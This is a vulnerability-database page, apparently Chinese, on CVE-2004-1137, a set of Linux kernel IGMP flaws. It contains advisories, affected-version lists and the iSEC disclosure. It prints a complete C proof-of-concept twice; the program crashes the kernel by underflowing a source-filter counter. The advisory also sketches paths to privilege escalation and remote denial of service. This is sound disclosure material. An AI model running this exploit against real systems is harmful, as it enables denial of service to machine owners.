CVE-2004-1137
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:51:37
NMCOEPS    

[原文]Multiple vulnerabilities in the IGMP functionality for Linux kernel 2.4.22 to 2.4.28, and 2.6.x to 2.6.9, allow local and remote attackers to cause a denial of service or execute arbitrary code via (1) the ip_mc_source function, which decrements a counter to -1, or (2) the igmp_marksources function, which does not properly validate IGMP message parameters and performs an out-of-bounds read.


[CNNVD]Linux Kernel IGMP 拒绝服务/代码执行漏洞(CNNVD-200501-157)

        Linux Kernel是开放源代码操作系统Linux的内核。
        Linux kernel 2.4.22至2.4.28及2.6.x至2.6.9版本中的IGMP功能模块存在多个漏洞。
        攻击者可通过以下方式导致拒绝服务或执行任意代码:(1)通过ip_mc_source函数可导致系统计数器耗尽;(2)igmp_sources函数没有正确检验IGMP消息参数,可出现内存越界读取。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.6.0:test4Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.6.0:test5Linux Kernel 2.6 test5
cpe:/o:linux:linux_kernel:2.6.0:test2Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.6.0:test3Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.6.0:test8Linux Kernel 2.6 test8
cpe:/o:linux:linux_kernel:2.6.0:test9Linux Kernel 2.6 test9
cpe:/o:linux:linux_kernel:2.6.0:test6Linux Kernel 2.6 test6
cpe:/o:linux:linux_kernel:2.6.0:test7Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.6.0:test11Linux Kernel 2.6 test11
cpe:/o:linux:linux_kernel:2.6.0:test1Linux Kernel 2.6 test1
cpe:/o:linux:linux_kernel:2.6.0:test10Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.6.9:2.6.20
cpe:/o:linux:linux_kernel:2.6.8Linux Kernel 2.6.8
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:ubuntu:ubuntu_linux:4.1::ia64
cpe:/o:linux:linux_kernel:2.6.6:rc1Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.7:rc1Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.8:rc1Linux Kernel 2.6.8 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.8:rc2Linux Kernel 2.6.8 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.8:rc3Linux Kernel 2.6.8 Release Candidate 3
cpe:/o:linux:linux_kernel:2.4.0:test2Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.0:test3Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.4.0:test8Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.4.0:test9Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.0:test6Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.0:test7Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.6.7Linux Kernel 2.6.7
cpe:/o:linux:linux_kernel:2.6.6Linux Kernel 2.6.6
cpe:/o:linux:linux_kernel:2.6.5Linux Kernel 2.6.5
cpe:/o:linux:linux_kernel:2.6.4Linux Kernel 2.6.4
cpe:/o:linux:linux_kernel:2.4.27:pre5Linux Kernel 2.4.27 pre5
cpe:/o:linux:linux_kernel:2.4.27:pre3Linux Kernel 2.4.27 pre3
cpe:/o:linux:linux_kernel:2.4.0:test4Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.0:test5Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/o:linux:linux_kernel:2.4.27:pre4Linux Kernel 2.4.27 pre4
cpe:/o:linux:linux_kernel:2.4.21:pre4Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0
cpe:/o:linux:linux_kernel:2.4.21:pre7Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.4.23:pre9Linux Kernel 2.4.23 pre9
cpe:/o:linux:linux_kernel:2.4.0:test12Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test11Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.4.0:test1Linux Kernel 2.4.0 test1
cpe:/o:ubuntu:ubuntu_linux:4.1::ppc
cpe:/o:linux:linux_kernel:2.4.0:test10Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.18:pre1Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.19:pre1Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre2Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.18:pre6Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.18:pre3Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.4.27:pre1Linux Kernel 2.4.27 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre4Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.19:pre5Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.4.27:pre2Linux Kernel 2.4.27 pre2
cpe:/o:linux:linux_kernel:2.4.19:pre6Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.21:pre1Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre3Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.18:pre7Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.19:pre4Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.18:pre8Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.18:pre5Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.4.27Linux Kernel 2.4.27
cpe:/o:linux:linux_kernel:2.4.26Linux Kernel 2.4.26
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.4.28Linux Kernel 2.4.28
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:11144Multiple vulnerabilities in the IGMP functionality for Linux kernel 2.4.22 to 2.4.28, and 2.6.x to 2.6.9, allow local and remote attackers t...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1137
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1137
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-157
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000930
(UNKNOWN)  CONECTIVA  CLA-2005:930
http://isec.pl/vulnerabilities/isec-0018-igmp.txt
(UNKNOWN)  MISC  http://isec.pl/vulnerabilities/isec-0018-igmp.txt
http://marc.info/?l=bugtraq&m=110306397320336&w=2
(UNKNOWN)  BUGTRAQ  20041214 [USN-38-1] Linux kernel vulnerabilities
http://www.mandriva.com/security/advisories?name=MDKSA-2005:022
(UNKNOWN)  MANDRAKE  MDKSA-2005:022
http://www.novell.com/linux/security/advisories/2004_44_kernel.html
(UNKNOWN)  SUSE  SUSE-SA:2004:044
http://www.redhat.com/support/errata/RHSA-2005-092.html
(UNKNOWN)  REDHAT  RHSA-2005:092
http://xforce.iss.net/xforce/xfdb/18481
(UNKNOWN)  XF  linux-ipmcsource-code-execution(18481)
http://xforce.iss.net/xforce/xfdb/18482
(UNKNOWN)  XF  linux-igmpmarksources-dos(18482)
https://bugzilla.fedora.us/show_bug.cgi?id=2336
(UNKNOWN)  FEDORA  FLSA:2336

- 漏洞信息

Linux Kernel IGMP 拒绝服务/代码执行漏洞
危急 设计错误
2005-01-10 00:00:00 2005-10-20 00:00:00
远程※本地  
        Linux Kernel是开放源代码操作系统Linux的内核。
        Linux kernel 2.4.22至2.4.28及2.6.x至2.6.9版本中的IGMP功能模块存在多个漏洞。
        攻击者可通过以下方式导致拒绝服务或执行任意代码:(1)通过ip_mc_source函数可导致系统计数器耗尽;(2)igmp_sources函数没有正确检验IGMP消息参数,可出现内存越界读取。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.kernel.org/

- 漏洞信息 (686)

Linux Kernel (<= 2.6.9, 2.4.22-28) (igmp.c) Local Denial of Service Exploit (EDBID:686)
linux dos
2004-12-14 Verified
0 Paul Starzetz
N/A [点击下载]
/*
* Linux igmp.c local DoS
* Warning: this code will crash your machine!
*
* gcc -O2 mreqfck.c -o mreqfck
*
* Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/types.h>

#define MCAST_INCLUDE                   1
#define IP_MSFILTER                     41

#define IP_UNBLOCK_SOURCE               37
#define IP_BLOCK_SOURCE                 38

struct ip_msfilter
{
   __u32 imsf_multiaddr;
   __u32 imsf_interface;
   __u32 imsf_fmode;
   __u32 imsf_numsrc;
   __u32 imsf_slist[1];
};

struct ip_mreq_source
{
   __u32 imr_multiaddr;
   __u32 imr_interface;
   __u32 imr_sourceaddr;
};

void
fatal (const char *message)
{
   printf ("\n");
   if (!errno)
     {
         fprintf (stdout, "FATAL: %s\n", message);
     }
   else
     {
         fprintf (stdout, "FATAL: %s (%s) ", message,
                  (char *) (strerror (errno)));
     }
   printf ("\n");
   fflush (stdout);
   exit (1);
}

int
main ()
{
   int s, r, l;
   struct ip_mreqn mr;
   struct ip_msfilter msf;
   struct ip_mreq_source ms;
   in_addr_t a1, a2;

   s = socket (AF_INET, SOCK_DGRAM, 0);
   if (s < 0)
       fatal ("socket");

//      first join mcast group
   memset (&mr, 0, sizeof (mr));
   mr.imr_multiaddr.s_addr = inet_addr ("224.0.0.199");
   l = sizeof (mr);
   r = setsockopt (s, SOL_IP, IP_ADD_MEMBERSHIP, &mr, l);
   if (r < 0)
       fatal ("setsockopt");

//      add source filter count=1
   memset (&ms, 0, sizeof (ms));
   ms.imr_multiaddr = inet_addr ("224.0.0.199");
   ms.imr_sourceaddr = inet_addr ("4.5.6.7");
   l = sizeof (ms);
   r = setsockopt (s, SOL_IP, IP_BLOCK_SOURCE, &ms, l);
   if (r < 0)
       fatal ("setsockopt2");

//      del source filter count = 0
//      imr_multiaddr & imr_interface must correspond to ADD
   memset (&ms, 0, sizeof (ms));
   ms.imr_multiaddr = inet_addr ("224.0.0.199");
   ms.imr_sourceaddr = inet_addr ("4.5.6.7");
   l = sizeof (ms);
   r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);
   if (r < 0)
       fatal ("setsockopt2");

//      del again, count = -1
   memset (&ms, 0, sizeof (ms));
   ms.imr_multiaddr = inet_addr ("224.0.0.199");
   ms.imr_sourceaddr = inet_addr ("4.5.6.7");
   l = sizeof (ms);
   r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);
   if (r < 0)
       fatal ("setsockopt3");

//      crash
   memset (&ms, 0, sizeof (ms));
   ms.imr_multiaddr = inet_addr ("224.0.0.199");
   ms.imr_sourceaddr = inet_addr ("4.5.6.7");
   l = sizeof (ms);
   r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);
   if (r < 0)
       fatal ("setsockopt4");

   getchar ();

   return 0;
}

// milw0rm.com [2004-12-14]
		

- 漏洞信息 (F35339)

Ubuntu Security Notice 38-1 (PacketStormID:F35339)
2004-12-30 00:00:00
Ubuntu  security.ubuntu.com
advisory,kernel,vulnerability
linux,ubuntu
CVE-2004-0814,CVE-2004-1016,CVE-2004-1056,CVE-2004-1058,CVE-2004-1068,CVE-2004-1069,CVE-2004-1137,CVE-2004-1151
[点击下载]

Ubuntu Security Notice USN-38-1 - This advisory covers all the recent vulnerabilities discovered in the Linux 2.6 kernel series.

===========================================================
Ubuntu Security Notice USN-38-1		  December 14, 2004
linux-source-2.6.8.1 vulnerabilities
CAN-2004-0814, CAN-2004-1016, CAN-2004-1056, CAN-2004-1058, 
CAN-2004-1068, CAN-2004-1069, CAN-2004-1137, CAN-2004-1151
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

linux-image-2.6.8.1-4-386
linux-image-2.6.8.1-4-686
linux-image-2.6.8.1-4-686-smp
linux-image-2.6.8.1-4-amd64-generic
linux-image-2.6.8.1-4-amd64-k8
linux-image-2.6.8.1-4-amd64-k8-smp
linux-image-2.6.8.1-4-amd64-xeon
linux-image-2.6.8.1-4-k7
linux-image-2.6.8.1-4-k7-smp
linux-image-2.6.8.1-4-power3
linux-image-2.6.8.1-4-power3-smp
linux-image-2.6.8.1-4-power4
linux-image-2.6.8.1-4-power4-smp
linux-image-2.6.8.1-4-powerpc
linux-image-2.6.8.1-4-powerpc-smp

The problem can be corrected by upgrading the affected package to
version 2.6.8.1-16.3. You need to reboot the computer after doing a
standard system upgrade to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change this kernel got a new
version number, which requires to recompile and reinstall all third
party kernel modules you might have installed. If you use
linux-restricted-modules, you have to update that package as well to
get modules which work with the new kernel version.

Details follow:

CAN-2004-0814:

  Vitaly V. Bursov discovered a Denial of Service vulnerability in the "serio"
  code; opening the same tty device twice and doing some particular operations on
  it caused a kernel panic and/or a system lockup.  

  Fixing this vulnerability required a change in the Application Binary
  Interface (ABI) of the kernel. This means that third party user installed
  modules might not work any more with the new kernel, so this fixed kernel got
  a new ABI version number. You have to recompile and reinstall all third party
  modules.

CAN-2004-1016:

  Paul Starzetz discovered a buffer overflow vulnerability in the "__scm_send"
  function which handles the sending of UDP network packets. A wrong validity
  check of the cmsghdr structure allowed a local attacker to modify kernel
  memory, thus causing an endless loop (Denial of Service) or possibly even
  root privilege escalation.

CAN-2004-1056:

  Thomas Hellstr    

- 漏洞信息 (F35333)

isec-0018-igmp.txt (PacketStormID:F35333)
2004-12-30 00:00:00
Paul Starzetz  isec.pl
exploit,kernel
linux
CVE-2004-1137
[点击下载]

Multiple bugs both locally and remotely exploitable have been found in the Linux IGMP networking module and the corresponding user API. Full exploit provided. Linux kernels 2.4 up to and include 2.4.28 and 2.6 up to and including 2.6.9 are affected.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Synopsis:  Linux kernel IGMP vulnerabilities
Product:   Linux kernel
Version:   2.4 up to and including 2.4.28, 2.6 up to and including 2.6.9
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0018-igmp.txt
CVE:       CAN-2004-1137
Author:    Paul Starzetz <ihaquer@isec.pl>
Date:      Dec 14, 2004


Issue:
======

Multiple locally as well as remotely exploitable bugs have been found in
the Linux IGMP networking module and the corresponding user API.


Details:
========

The IGMP (or internet group management protocol) is today's standard for
delivering  multicast  functionality to internet hosts. The Linux kernel
incorporates a base set of the IGMPv2 and IGMPv3 specifications  and  is
subdivided into two logical parts:

- - the IGMP/IP networking module responsible for network level operation,
that is only compiled into the kernel if configured for multicasting,

- - the socket API delivering  multicasting  capabilities  to  user  level
applications, which is always available on Linux.

Both parts of the IGMP subsystem have exploitable flaws:

(1) the ip_mc_source() function, that can be called through the user API
(the  IP_(UN)BLOCK_SOURCE,  IP_ADD/DROP_SOURCE_MEMBERSHIP  as  well   as
MCAST_(UN)BLOCK_SOURCE  and  MCAST_JOIN/LEAVE_SOURCE_GROUP socket SOL_IP
level options) suffers from a serious  kernel  hang  and  kernel  memory
overwrite problem.

It   is   possible   to   decrement   the   'sl_count'  counter  of  the
'ip_sf_socklist' structure to  be  0xffffffff  (that  is  -1  as  signed
integer,  see  attached  PoC code) with the consequence, that a repeated
call to above function will start a  kernel  loop  counting  from  0  to
UINT_MAX.  This  will  cause a kernel hang for minutes (depending on the
machine speed).

Right after that the whole  kernel  memory  following  the  kmalloc'ated
buffer  will  be  shifted by 4 bytes causing an immediate machine reboot
under normal operating conditions. If properly exploited this will  lead
to elevated privileges.

(2)  Because  of  the  bug  (1)  it is possible to read huge portions of
kernel memory following a kernel buffer through the  ip_mc_msfget()  and
ip_mc_gsfget() (user API) functions.

(3) The igmp_marksources() function from the network module is called in
the context of an IGMP group query received from the network and suffers
from  an  out  of bound read access to kernel memory. It happens because
the received IGMP message's parameters are not validated properly.  This
flaw is remotely exploitable on Linux machines with multicasting support
if and only if an application has bound a multicast socket.


Discussion:
=============

(1) It is quite obvious that moving around all kernel memory following a
kmalloc'ated  buffer  is a bad idea. However if done very carefully this
may give a local attacker elevated privileges.

We strongly believe that this flaw is very  easily  exploitable  on  SMP
machines (where one thread can interrupt the copy loop before the kernel
gets completely destroyed).

On uniprocessor configurations the exploitability is questionable  since
there  is  no other exit condition from the copy loop than a kernel oops
if we hit a non existing page. If  an  attacker  manages  to  trick  the
kernel  to  allocate  the  buffer  just right before the end of kernel's
physical memory mapping and also manages to place for example a LDT just
after  that buffer, he may gain elevated privileges also on uniprocessor
machines.

(2) No special handling is required to exploit this flaw in  conjunction
with  bug described in (1). This issue is slightly related to the loff_t
race discovered by iSEC in August 2004. Please refer to

http://www.isec.pl/vulnerabilities/isec-0016-procleaks.txt

for further information about consequences of reading privileged  kernel
memory.

(3) The last bug described here refers to a remote kernel vulnerability.
There are several conditions that must be meet for remote  exploitation.

First,  the kernel must have been compiled with multicasting support and
process incoming IGMP packets. Moreover, an attacker  must  be  able  to
send   group   queries   (IGMP_HOST_MEMBERSHIP_QUERY  messages)  to  the
vulnerable machine.

Second requirement is an application on the vulnerable  machine  with  a
bound  multicast  socket with attached source filter. There are numerous
applications using  multicasting  like  video  conferencing  or  routing
software,  just  to name few. The attacker must also know the IGMP group
used to perform the attack.

You can check if your configuration is vulnerable by  looking  at  these
files:

/proc/net/igmp
/proc/net/mcfilter

if both exist and are non-empty you are vulnerable!

Since  the  kernel  does not validate the ih3->nsrcs IGMP parameter, the
igmp_marksources() internal kernel function  may  access  kernel  memory
outside  of  the  allocated  socket  buffer  holding  the  IGMP message.
Depending on the relative position of the socket buffer  in  the  kernel
memory this may lead to an immediate kernel crash.

Another  consequence  is that the kernel will spend most of the CPU time
on scanning useless kernel data right after  the  buffer  if  the  nsrcs
parameter is very high. If a continuous flow of prepared IGMP packets is
sent to a vulnerable machine, it  may  stop  to  process  other  network
traffic.  For  an  average  machine  only a moderate IGMP packet flow is
required. This may lead to serious problems in case of routing software.


Impact:
=======

Unprivileged  local  users  may  gain elevated (root) privileges. Remote
users may hang or even crash a vulnerable Linux machine.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has  identified  the  vulnerability  and
performed  further  research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH  EXPRESS  PERMISSION  OF
ONE OF THE AUTHORS.


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty  of  any  kind,  whether
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of  the  information   provided  in
this  document.  Liability  claims regarding damage caused by the use of
any information provided, including any kind  of  information  which  is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

/*
 * Linux igmp.c local DoS
 * Warning: this code will crash your machine!
 *
 * gcc -O2 mreqfck.c -o mreqfck
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/types.h>


#define MCAST_INCLUDE    		1
#define IP_MSFILTER                     41

#define IP_UNBLOCK_SOURCE		37
#define IP_BLOCK_SOURCE			38


struct ip_msfilter
{
    __u32 imsf_multiaddr;
    __u32 imsf_interface;
    __u32 imsf_fmode;
    __u32 imsf_numsrc;
    __u32 imsf_slist[1];
};

struct ip_mreq_source
{
    __u32 imr_multiaddr;
    __u32 imr_interface;
    __u32 imr_sourceaddr;
};


void
fatal (const char *message)
{
    printf ("\n");
    if (!errno)
      {
	  fprintf (stdout, "FATAL: %s\n", message);
      }
    else
      {
	  fprintf (stdout, "FATAL: %s (%s) ", message,
		   (char *) (strerror (errno)));
      }
    printf ("\n");
    fflush (stdout);
    exit (1);
}


int
main ()
{
    int s, r, l;
    struct ip_mreqn mr;
    struct ip_msfilter msf;
    struct ip_mreq_source ms;
    in_addr_t a1, a2;

    s = socket (AF_INET, SOCK_DGRAM, 0);
    if (s < 0)
	fatal ("socket");

//      first join mcast group
    memset (&mr, 0, sizeof (mr));
    mr.imr_multiaddr.s_addr = inet_addr ("224.0.0.199");
    l = sizeof (mr);
    r = setsockopt (s, SOL_IP, IP_ADD_MEMBERSHIP, &mr, l);
    if (r < 0)
	fatal ("setsockopt");

//      add source filter count=1
    memset (&ms, 0, sizeof (ms));
    ms.imr_multiaddr = inet_addr ("224.0.0.199");
    ms.imr_sourceaddr = inet_addr ("4.5.6.7");
    l = sizeof (ms);
    r = setsockopt (s, SOL_IP, IP_BLOCK_SOURCE, &ms, l);
    if (r < 0)
	fatal ("setsockopt2");

//      del source filter count = 0
//      imr_multiaddr & imr_interface must correspond to ADD
    memset (&ms, 0, sizeof (ms));
    ms.imr_multiaddr = inet_addr ("224.0.0.199");
    ms.imr_sourceaddr = inet_addr ("4.5.6.7");
    l = sizeof (ms);
    r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);
    if (r < 0)
	fatal ("setsockopt2");

//      del again, count = -1
    memset (&ms, 0, sizeof (ms));
    ms.imr_multiaddr = inet_addr ("224.0.0.199");
    ms.imr_sourceaddr = inet_addr ("4.5.6.7");
    l = sizeof (ms);
    r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);
    if (r < 0)
	fatal ("setsockopt3");

//      crash
    memset (&ms, 0, sizeof (ms));
    ms.imr_multiaddr = inet_addr ("224.0.0.199");
    ms.imr_sourceaddr = inet_addr ("4.5.6.7");
    l = sizeof (ms);
    r = setsockopt (s, SOL_IP, IP_UNBLOCK_SOURCE, &ms, l);
    if (r < 0)
	fatal ("setsockopt4");

    getchar ();

    return 0;
}

- -- 
Paul Starzetz
iSEC Security Research
http://isec.pl/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBvsD+C+8U3Z5wpu4RAqhaAKDTGHk3y41KNhQV+RFawIIHlZ23+ACg7uXs
qsrWw5lR18rlD2BatbUPLAc=
=s5/E
-----END PGP SIGNATURE-----


    

- 漏洞信息

12386
Linux Kernel IGMP ip_mc_source() Function Arbitrary Memory Overwrite

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-12-14 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux Kernel IGMP Multiple Vulnerabilities
Design Error 11917
Yes Yes
2004-12-14 12:00:00 2009-07-12 09:26:00
Discovery is credited to Paul Starzetz <ihaquer@isec.pl>.

- 受影响的程序版本

Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
RedHat Linux 9.0 i386
RedHat Linux 7.3 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
Mandriva Linux Mandrake 10.0
Mandriva Linux Mandrake 9.2 amd64
Mandriva Linux Mandrake 9.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Linux kernel 2.6.9
Linux kernel 2.6.8 rc3
Linux kernel 2.6.8 rc2
Linux kernel 2.6.8 rc1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.8
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.4.28
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.4.27 -pre5
Linux kernel 2.4.27 -pre4
Linux kernel 2.4.27 -pre3
Linux kernel 2.4.27 -pre2
Linux kernel 2.4.27 -pre1
Linux kernel 2.4.27
Linux kernel 2.4.26
Linux kernel 2.4.25
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21 pre7
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
